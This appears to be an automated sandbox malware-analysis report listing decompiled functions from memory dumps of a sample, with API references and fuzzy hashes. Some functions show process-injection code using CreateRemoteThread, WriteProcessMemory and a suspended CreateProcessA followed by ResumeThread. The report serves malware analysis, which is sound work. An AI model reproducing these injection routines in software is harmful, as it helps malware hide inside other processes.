                                                                            • String ID:
                                                                            • API String ID: 310444273-0
                                                                            • Opcode ID: 075936419fbc5cca61900586e8d69370c668ceb23336568181fa16149c6eeaa8
                                                                            • Instruction ID: d4a4c4ef2a58cf9094cbc387d8303d04bade7ed1a93cf8cbbf6f48fd4d8bd229
                                                                            • Opcode Fuzzy Hash: 075936419fbc5cca61900586e8d69370c668ceb23336568181fa16149c6eeaa8
                                                                            • Instruction Fuzzy Hash: 790140B0605244AFEB05EB76ED42A5A7BF8DB49314F12047AF504E32E2E678EE50C618
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E0040CF98() {
    signed short _t13;
    int _t17;
    signed int _t21;
    signed int _t22;
    void* _t34;
    void* _t35;

    *0x4658c8 = 0x409;
    *0x004658CC = 9;
    *0x004658D0 = 1;
    _t13 = GetThreadLocale();
    if(_t13 != 0) {
        *0x4658c8 = _t13;
    }
    if(_t13 != 0) {
        *0x004658CC = _t13 & 0x3ff;
        *0x004658D0 = (_t13 & 0x0000ffff) >> 0xa;
    }
    memcpy(0x461808, 0x40d03c, 8 << 2);
    _t34 = 0x4658c8;
    if( *0x4617c4 <= 4 ||  *0x4617c0 != 2) {
        *((char*)(_t34 + 0xd)) = GetSystemMetrics(0x4a) & 0xffffff00 | _t15 != 0x00000000;
    } else {
        *0x0040D049 = 1;
    }
    _t17 = GetSystemMetrics(0x2a); // executed
    _t22 = _t21 & 0xffffff00 | _t17 != 0x00000000;
    *(_t34 + 0xc) = _t22;
    if(_t22 != 0) {
        return E0040CF3C(_t35);
    }
    return _t17;
}


                                                                            APIs
                                                                            • GetThreadLocale.KERNEL32 ref: 0040CFBA
                                                                            • GetSystemMetrics.USER32 ref: 0040D00D
                                                                            • GetSystemMetrics.USER32 ref: 0040D01C
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: MetricsSystem$LocaleThread
                                                                            • String ID:
                                                                            • API String ID: 2159509485-0
                                                                            • Opcode ID: d31af3ae54a2743ab8082880c82d106a239316ea3c0ded5d8796c9a92dcae73e
                                                                            • Instruction ID: 76d1b7ec664e111f503e51dd0c1979d9023841a60a1f3c9667e84ab395d3be29
                                                                            • Opcode Fuzzy Hash: d31af3ae54a2743ab8082880c82d106a239316ea3c0ded5d8796c9a92dcae73e
                                                                            • Instruction Fuzzy Hash: F3018860A407518AD3205B6694013637AC8DB02319F08C03FE88DE73C2EB3DD846836A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E035A45EC(void* __eax, void* __ecx, void* __edx, char _a4, long _a8) {
    void* _v8;
    long _v12;
    long _v16;
    void* _t16;
    void* _t23;
    void* _t32;
    void* _t33;

    _v8 = __ecx;
    _t23 = __eax;
    _t33 = E035A45BC(__eax, _a8, _v8);
    _t16 = CreateRemoteThread(_t23, 0, 0, E035A45BC(_t23, E035A4500(__edx), __edx), _t33, 0,  &_v16); // executed
    _t32 = _t16;
    if(_a4 != 0) {
        WaitForSingleObject(_t32, 0xffffffff);
        ReadProcessMemory(_t23, _t33, _v8, _a8,  &_v12);
    }
    return _t32;
}


                                                                            APIs
                                                                              • Part of subcall function 035A45BC: VirtualAllocEx.KERNEL32(0A74C085,00000000,00000018,00003000,00000040,00000018,?,00000000,00000018,0A74C085,035A49C7,00000000,kernel32.dll,ExitThread,00000000,kernel32.dll), ref: 035A45D2
                                                                              • Part of subcall function 035A45BC: WriteProcessMemory.KERNEL32(0A74C085,00000000,00000018,00000018,?,0A74C085,00000000,00000018,00003000,00000040,00000018,?,00000000,00000018,0A74C085,035A49C7), ref: 035A45DE
                                                                            • CreateRemoteThread.KERNEL32(0A74C085,00000000,00000000,00000000,00000000,00000000,?), ref: 035A462A
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000018,0A74C085), ref: 035A463A
                                                                            • ReadProcessMemory.KERNEL32(0A74C085,00000000,550A74C0,?,00000000,00000000,000000FF,00000000,00000018,0A74C085), ref: 035A464D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                            • Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp
                                                                            • Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: MemoryProcess$AllocCreateObjectReadRemoteSingleThreadVirtualWaitWrite
                                                                            • String ID:
                                                                            • API String ID: 3966641755-0
                                                                            • Opcode ID: 8ee8674f0dfdffdcf826dffac77f5da7d944114e7cf52932ab7de1a8faf29488
                                                                            • Instruction ID: 23b0dfa982663fdbc42de64737a77099f9d0c59b112728f104105bf4ede8877e
                                                                            • Opcode Fuzzy Hash: 8ee8674f0dfdffdcf826dffac77f5da7d944114e7cf52932ab7de1a8faf29488
                                                                            • Instruction Fuzzy Hash: E301A7757002087BD710E6EDAC80FAFB7EDABC9270F144169B518DB390D9749D0457A4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 68%
E035A552C(intOrPtr __eax, void* __ebx, intOrPtr* __ecx, char __edx, void* __esi) {
    intOrPtr _v8;
    char _v12;
    CHAR* _t22;
    struct HINSTANCE__* _t23;
    CHAR* _t26;
    intOrPtr _t31;
    intOrPtr* _t34;
    void* _t37;

    _t34 = __ecx;
    _v12 = __edx;
    _v8 = __eax;
    E035947CC(_v8);
    E035947CC(_v12);
    _push(_t37);
    _push(0x35a55b1);
    _push( *[fs:eax]);
    *[fs:eax] = _t37 + 0xfffffff8;
    _t26 = E035947DC(_v8);
    LoadLibraryA(_t26); // executed
    *0x35ad390 = GetModuleHandleA(_t26);
    if( *0x35ad390 != 0) {
        _t22 = E035947DC(_v12);
        _t23 = *0x35ad390; // 0x0
        *_t34 = GetProcAddress(_t23, _t22);
    }
    _pop(_t31);
    *[fs:eax] = _t31;
    _push(0x35a55b8);
    return E03594360( &_v12, 2);
}

                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,035A55B1,?,?,00000000), ref: 035A5565
                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,035A55B1,?,?,00000000), ref: 035A556D
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A558F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                            • Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp
                                                                            • Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                                            • String ID:
                                                                            • API String ID: 310444273-0
                                                                            • Opcode ID: 6f8d2fa40c66829d911f34fa713746eaede771555874173946ffaa485200e174
                                                                            • Instruction ID: 847973b41d0c2d687e57806c6e9f0c5b6232b014acfc342fe562d325ce77106f
                                                                            • Opcode Fuzzy Hash: 6f8d2fa40c66829d911f34fa713746eaede771555874173946ffaa485200e174
                                                                            • Instruction Fuzzy Hash: 58012CB4600709AFEB00FBA9EC6195EB7F8FB8E610F510966A404D7660E7349D06AB10
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E00423CC2(void* __eax, char* __ecx, char __edx, char* _a4, int _a8) {
    int _v8;
    char _v12;
    char _v16;
    void* __ebx;
    void* __edi;
    void* __esi;
    void* __ebp;
    long _t18;
    void* _t26;
    intOrPtr _t30;
    char _t38;

    _t35 = __ecx;
    _t38 = __edx;
    _t26 = __eax;
    _v8 = 0;
    _t18 = RegQueryValueExA( *(_t26 + 4), E00404C00(__edx), 0, &_v8, __ecx, &_a8); // executed
    if(_t18 != 0) {
        _v16 = _t38;
        _v12 = 0xb;
        _t30 = *0x462f48; // 0x4161b8
        E0040C214(_t26, _t30, 1, _t35, _t38, 0, &_v16);
        E00404184();
    }
    *_a4 = E004238F0(_v8);
    return _a8;
}

                                                                            APIs
                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00423CEF
                                                                            Strings
                                                                            • 48B , xrefs: 00423D0D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: QueryValue
                                                                            • String ID: 48B
                                                                            • API String ID: 3660427363-1399719961
                                                                            • Opcode ID: 0794083d3378ee110cbc96ea9d2242b7670d2b8dc1216ac4c1635f1df70efc8f
                                                                            • Instruction ID: dc9a7b025fb012292c3c1f78a1d553d82cca77016de03337154782b34ab35c11
                                                                            • Opcode Fuzzy Hash: 0794083d3378ee110cbc96ea9d2242b7670d2b8dc1216ac4c1635f1df70efc8f
                                                                            • Instruction Fuzzy Hash: 55012175B00208BFD700EF99DC81A9AB7FCDB59314F10817AFD14DB281DA759E0487A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E00423CC4(void* __eax, char* __ecx, char __edx, char* _a4, int _a8) {
    int _v8;
    char _v12;
    char _v16;
    void* __ebx;
    void* __edi;
    void* __esi;
    void* __ebp;
    long _t18;
    void* _t25;
    intOrPtr _t28;
    char _t33;

    _t32 = __ecx;
    _t33 = __edx;
    _t25 = __eax;
    _v8 = 0;
    _t18 = RegQueryValueExA( *(_t25 + 4), E00404C00(__edx), 0, &_v8, __ecx, &_a8); // executed
    if(_t18 != 0) {
        _v16 = _t33;
        _v12 = 0xb;
        _t28 = *0x462f48; // 0x4161b8
        E0040C214(_t25, _t28, 1, _t32, _t33, 0, &_v16);
        E00404184();
    }
    *_a4 = E004238F0(_v8);
    return _a8;
}

                                                                            APIs
                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00423CEF
                                                                            Strings
                                                                            • 48B , xrefs: 00423D0D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: QueryValue
                                                                            • String ID: 48B
                                                                            • API String ID: 3660427363-1399719961
                                                                            • Opcode ID: 5053dc36f7366c11ef80729d79039a07f790926b80e060c94d0a9636341c036b
                                                                            • Instruction ID: a8e3a137c339f5fd24472462273deb51e711ff11fc4394b496541acd54afbdef
                                                                            • Opcode Fuzzy Hash: 5053dc36f7366c11ef80729d79039a07f790926b80e060c94d0a9636341c036b
                                                                            • Instruction Fuzzy Hash: 45012175B00208BBD700EF99DC81A9AB7BCDB59314F10817AFD14DB281DA759E0487A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 65%
E00423BD0(intOrPtr* __eax, signed int __ebx, char* __ecx, void* __edx, void* __fp0) {
    long _t16;
    intOrPtr* _t32;
    char* _t35;
    intOrPtr* _t37;

    _pop(_t37);
    *__eax = *__eax + __eax;
    *((intOrPtr*)(__ebx + 0x56)) = *((intOrPtr*)(__ebx + 0x56)) + __edx;
    _push(__ebx);
    _push(__ecx);
    _t35 = __ecx;
    _t32 = __eax;
    E00403264(__ecx, 8);
    _t16 = RegQueryValueExA( *(_t32 + 4), E00404C00(__edx), 0, _t37 + 8, 0, _t35 + 4); // executed
    *_t35 = E004238F0( *_t37);
    return __ebx & 0xffffff00 | _t16 == 0x00000000;
}

                                                                            APIs
                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,00423C38), ref: 00423C06
                                                                            Strings
                                                                            • MS Shell Dlg 2 , xrefs: 00423BD7
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: QueryValue
                                                                            • String ID: MS Shell Dlg 2
                                                                            • API String ID: 3660427363-3198668166
                                                                            • Opcode ID: 24aede73455477a306b869990c3da6da698364b98985e0eaff83912404be2809
                                                                            • Instruction ID: 7c8ec6a0d6e2363a4a3569427e10175affe607f8ccc4c0b7cc53773ec14cf429
                                                                            • Opcode Fuzzy Hash: 24aede73455477a306b869990c3da6da698364b98985e0eaff83912404be2809
                                                                            • Instruction Fuzzy Hash: FCF0826230D2446FD704EA6EAC41BAB7BDCDBC5310F05807FF948C7582DA24DD088369
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 82%
E00423BD4(void* __eax, char* __ecx, void* __edx, void* __fp0) {
    long _t14;
    signed int _t18;
    void* _t26;
    char* _t27;
    intOrPtr* _t28;

    _push(__ecx);
    _t27 = __ecx;
    _t26 = __eax;
    E00403264(__ecx, 8);
    _t14 = RegQueryValueExA( *(_t26 + 4), E00404C00(__edx), 0, _t28 + 8, 0, _t27 + 4); // executed
    *_t27 = E004238F0( *_t28);
    return _t18 & 0xffffff00 | _t14 == 0x00000000;
}

                                                                            APIs
                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,00423C38), ref: 00423C06
                                                                            Strings
                                                                            • MS Shell Dlg 2 , xrefs: 00423BD5, 00423BD7
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: QueryValue
                                                                            • String ID: MS Shell Dlg 2
                                                                            • API String ID: 3660427363-3198668166
                                                                            • Opcode ID: ae18820a77b22da24d61138b18a13f76920247e522b4d3da3e4fdaa58bf8c099
                                                                            • Instruction ID: 41461fa9fb353abdc0202eda5798ac71598ea82e96ed0a8436159ebd475baf22
                                                                            • Opcode Fuzzy Hash: ae18820a77b22da24d61138b18a13f76920247e522b4d3da3e4fdaa58bf8c099
                                                                            • Instruction Fuzzy Hash: 92F030723092046BE704EA6EAD41FABA7DCDBC9355F11803EF948D7281DA24DD088365
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 77%
E004605D0(void* __ecx, void* __edi, void* __esi) {
    intOrPtr _t6;
    intOrPtr _t8;
    intOrPtr _t10;
    intOrPtr _t12;
    intOrPtr _t14;
    void* _t16;
    void* _t17;
    intOrPtr _t20;
    intOrPtr _t21;
    intOrPtr _t22;
    intOrPtr _t23;
    intOrPtr _t28;

    _t25 = __esi;
    _t17 = __ecx;
    _push(_t28);
    _push(0x460656);
    _push( *[fs:eax]);
    *[fs:eax] = _t28;
    *0x4664fc = *0x4664fc - 1;
    if( *0x4664fc < 0) {
        *0x4664f8 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
        _t31 = *0x4664f8;
        E004478D4(_t16, __edi, *0x4664f8);
        _t6 = *0x4362e8; // 0x436334
        E0041A040(_t6, _t16, _t17, *0x4664f8);
        _t8 = *0x4362e8; // 0x436334
        E0041A0E0(_t8, _t16, _t17, _t31);
        _t21 = *0x4362e8; // 0x436334
        _t10 = *0x447f50; // 0x447f9c
        E0041A08C(_t10, _t16, _t21, __esi, _t31);
        _t22 = *0x4362e8; // 0x436334
        _t12 = *0x44958c; // 0x4495d8
        E0041A08C(_t12, _t16, _t22, __esi, _t31);
        _t23 = *0x4362e8; // 0x436334
        _t14 = *0x4496b0; // 0x4496fc
        E0041A08C(_t14, _t16, _t23, _t25, _t31);
    }
    _pop(_t20);
    *[fs:eax] = _t20;
    _push(0x46065d);
    return 0;
}

                                                                            APIs
                                                                            • GetVersion.KERNEL32(00000000,00460656), ref: 004605EA
                                                                              • Part of subcall function 004478D4: GetCurrentProcessId.KERNEL32(?,00000000,00447A4C), ref: 004478F5
                                                                              • Part of subcall function 004478D4: GlobalAddAtomA.KERNEL32 ref: 00447928
                                                                              • Part of subcall function 004478D4: GetCurrentThreadId.KERNEL32 ref: 00447943
                                                                              • Part of subcall function 004478D4: GlobalAddAtomA.KERNEL32 ref: 00447979
                                                                              • Part of subcall function 004478D4: RegisterWindowMessageA.USER32(00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 0044798F
                                                                              • Part of subcall function 004478D4: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 00447A13
                                                                              • Part of subcall function 004478D4: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00447A24
                                                                            Strings
                                                                            • 4cC , xrefs: 00460604, 0046060E, 00460618, 00460628, 00460638
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AtomCurrentGlobal$AddressHandleMessageModuleProcProcessRegisterThreadVersionWindow
                                                                            • String ID: 4cC
                                                                            • API String ID: 3557136124-2099690512
                                                                            • Opcode ID: a912815bf11363b93ca19f7a7f60a486b9a53906b6aed234051300934d9d5803
                                                                            • Instruction ID: 025689f7684f9bed17e1c02e81f1f2566ccf6c41d45d360a3a3928fa787afd4c
                                                                            • Opcode Fuzzy Hash: a912815bf11363b93ca19f7a7f60a486b9a53906b6aed234051300934d9d5803
                                                                            • Instruction Fuzzy Hash: C5F0FF39244241AFD311FF26EC5291B3BA4E789314353857BE84043675DA3DECA1DB9E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 77%
                                                                            E0045ED90(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                intOrPtr _v8;
                                                                                intOrPtr _v12;
                                                                                char _v16;
                                                                                intOrPtr _t16;
                                                                                intOrPtr _t17;
                                                                                intOrPtr _t20;
                                                                                CHAR* _t26;
                                                                                struct HINSTANCE__* _t27;
                                                                                intOrPtr _t28;
                                                                                struct HINSTANCE__* _t35;
                                                                                intOrPtr _t38;
                                                                                CHAR* _t50;
                                                                                void* _t51;
                                                                                intOrPtr _t53;
                                                                                void* _t60;

                                                                                _push(__ebx);
                                                                                _v16 = 0;
                                                                                _v8 = __eax;
                                                                                _push(_t60);
                                                                                _push(0x45eed7);
                                                                                _push( *[fs:eax]);
                                                                                 *[fs:eax] = _t60 + 0xfffffff4;
                                                                                0;
                                                                                 *0x46666c = _v8;
                                                                                while(1) {
                                                                                    _t16 =  *0x46666c; // 0x2e980f0
                                                                                    if( *((intOrPtr*)(_t16 + 0xc)) == 0) {
                                                                                        break;
                                                                                    }
                                                                                    0;
                                                                                    0;
                                                                                    _t17 =  *0x46666c; // 0x2e980f0
                                                                                    _t4 = _t17 + 0xc; // 0x0
                                                                                     *0x46667c =  *_t4 +  *0x466630;
                                                                                    _push(0x466680);
                                                                                    _t20 =  *0x46665c; // 0x0
                                                                                    _v12 = _t20;
                                                                                    _push(E004058B4());
                                                                                    _t50 =  *0x46667c; // 0x2e98ccc
                                                                                    E00404934( &_v16, _t50);
                                                                                    _pop(_t51);
                                                                                    if(E0045ECA0(0x466670, _t51) == 0) {
                                                                                        0;
                                                                                        _t26 =  *0x46667c; // 0x2e98ccc
                                                                                        _t27 = LoadLibraryA(_t26); // executed
                                                                                         *0x466668 = _t27;
                                                                                    }
                                                                                    _t28 =  *0x46666c; // 0x2e980f0
                                                                                    if( *((intOrPtr*)(_t28 + 4)) != 0) {
                                                                                        0;
                                                                                        0;
                                                                                    } else {
                                                                                        0;
                                                                                        0;
                                                                                        0;
                                                                                        _t38 =  *0x46666c; // 0x2e980f0
                                                                                        _t10 = _t38 + 0x10; // 0x0
                                                                                         *0x466670 =  *_t10 +  *0x466630;
                                                                                    }
                                                                                    while( *((intOrPtr*)( *0x466670)) != 0) {
                                                                                         *0x466674 =  *((intOrPtr*)( *0x466670)) +  *0x466630 + 2;
                                                                                        _t35 =  *0x466668; // 0x6f9f0000
                                                                                         *0x466678 = GetProcAddress(_t35,  *0x466674);
                                                                                         *((intOrPtr*)( *0x466670)) =  *0x466678;
                                                                                         *0x466670 =  *0x466670 + 4;
                                                                                    }
                                                                                     *0x46666c =  *0x46666c + 0x14;
                                                                                }
                                                                                _pop(_t53);
                                                                                 *[fs:eax] = _t53;
                                                                                _push(0x45eede);
                                                                                return E0040473C( &_v16);
                                                                            }


                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(02E98CCC,00466680,00000000,0045EED7), ref: 0045EE31
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 97d185083bbda5420dd8d0232ad7df22f33ba54b0d8fe9ee6b458a3115588826
                                                                            • Instruction ID: 41749767bb47e492ca36cbe40e98458e297fbfc91c6430a84583a06b372d5935
                                                                            • Opcode Fuzzy Hash: 97d185083bbda5420dd8d0232ad7df22f33ba54b0d8fe9ee6b458a3115588826
                                                                            • Instruction Fuzzy Hash: D8313AB0A01600EFCB04CF29F882E5677F4EB4A310B12857AE805D7361E379AD05CF5A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 85%
                                                                            E035A48A8(CHAR* __eax, struct _SECURITY_ATTRIBUTES* __ecx, CHAR* __edx, intOrPtr _a4, struct _PROCESS_INFORMATION* _a8, struct _STARTUPINFOA* _a12, CHAR* _a16, void* _a20, signed int _a24, void* _a28, struct _SECURITY_ATTRIBUTES* _a32) {
                                                                                CHAR* _v8;
                                                                                CHAR* _v12;
                                                                                struct _SECURITY_ATTRIBUTES* _v16;
                                                                                void* __ebx;
                                                                                void* __edi;
                                                                                void* __esi;
                                                                                void* __ebp;
                                                                                int _t28;
                                                                                void* _t31;
                                                                                struct _PROCESS_INFORMATION* _t38;
                                                                                signed int _t39;
                                                                                void* _t43;

                                                                                _t35 = __ecx;
                                                                                _v16 = __ecx;
                                                                                _v12 = __edx;
                                                                                _v8 = __eax;
                                                                                _t38 = _a8;
                                                                                _t39 = _a24;
                                                                                _t34 = 0;
                                                                                _t23 = _t39 | 0x00000004;
                                                                                asm("cmc");
                                                                                asm("sbb eax, eax");
                                                                                _t28 = CreateProcessA(_v8, _v12, _v16, _a32, _t39 | 0x00000004, _t23, _a20, _a16, _a12, _t38); // executed
                                                                                if(_t28 != 0) {
                                                                                    _t31 = E035A4794(_t38->hProcess, 0, _t35, _a4, _t38, _t39, _t43); // executed
                                                                                    _t34 = _t31;
                                                                                    if((_t39 & 0x00000004) == 0) {
                                                                                        ResumeThread(_t38->hThread);
                                                                                    }
                                                                                }
                                                                                return _t34;
                                                                            }


                                                                            APIs
                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 035A48ED
                                                                              • Part of subcall function 035A4794: VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,035A4894,?,?,?,00000000), ref: 035A47E8
                                                                              • Part of subcall function 035A4794: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00003000,00000040,00000000,035A4894,?,?,?,00000000), ref: 035A47FB
                                                                              • Part of subcall function 035A4794: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00008000,?,?,00003000,00000040,00000000,035A4894,?,?), ref: 035A4815
                                                                              • Part of subcall function 035A4794: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,00003000,00000040,00000000,035A4894,?,?,?,00000000), ref: 035A4857
                                                                            • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 035A490E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                            • Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp
                                                                            • Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: Virtual$AllocProcess$CreateFreeMemoryResumeThreadWrite
                                                                            • String ID:
                                                                            • API String ID: 1551600056-0
                                                                            • Opcode ID: cddebfd46e960340c0a57e441cdf4bd4d4a4dd54064033c2b6274b5dbbf3529a
                                                                            • Instruction ID: 81f7de3f47d20117d47ce813b91c5ac2dd543fbe6c38bfec548e092467fb1f64
                                                                            • Opcode Fuzzy Hash: cddebfd46e960340c0a57e441cdf4bd4d4a4dd54064033c2b6274b5dbbf3529a
                                                                            • Instruction Fuzzy Hash: 3701D3B6A04219AFDB50DEADD880A9FB7FCAB48264F104165BA18E7310D770ED108BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadCursorA.USER32 ref: 004547A1
                                                                            • LoadCursorA.USER32 ref: 004547D0
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CursorLoad
                                                                            • String ID:
                                                                            • API String ID: 3238433803-0
                                                                            • Opcode ID: b46ed10e13b5891911fbcf58363eb243a181175a176f5a66f7bf3ab0bf39d95a
                                                                            • Instruction ID: 5b92fd6cb82509c6b3023340ad8d3fa0ece0f32d952ca65a9c1d4e2f0fe40f81
                                                                            • Opcode Fuzzy Hash: b46ed10e13b5891911fbcf58363eb243a181175a176f5a66f7bf3ab0bf39d95a
                                                                            • Instruction Fuzzy Hash: E3F08921B046441A9A20557E5CC0A7A72D4DBC773AF20033BFD39DF3D2D72D6C86415A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegFlushKey.ADVAPI32(00000000,?,004239F4,?,?,00000000,00423BA0,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 00423999
                                                                            • RegCloseKey.ADVAPI32(00000000,?,004239F4,?,?,00000000,00423BA0,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004239A2
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CloseFlush
                                                                            • String ID:
                                                                            • API String ID: 320916635-0
                                                                            • Opcode ID: 956964d0e594b963543663876903ecf3408bc7f3908dee6d6cb4c89ebefcd960
                                                                            • Instruction ID: 607071273b8a8f03ded242f4628478f4e142bd0fa1bf7c60492dcbfc477769d6
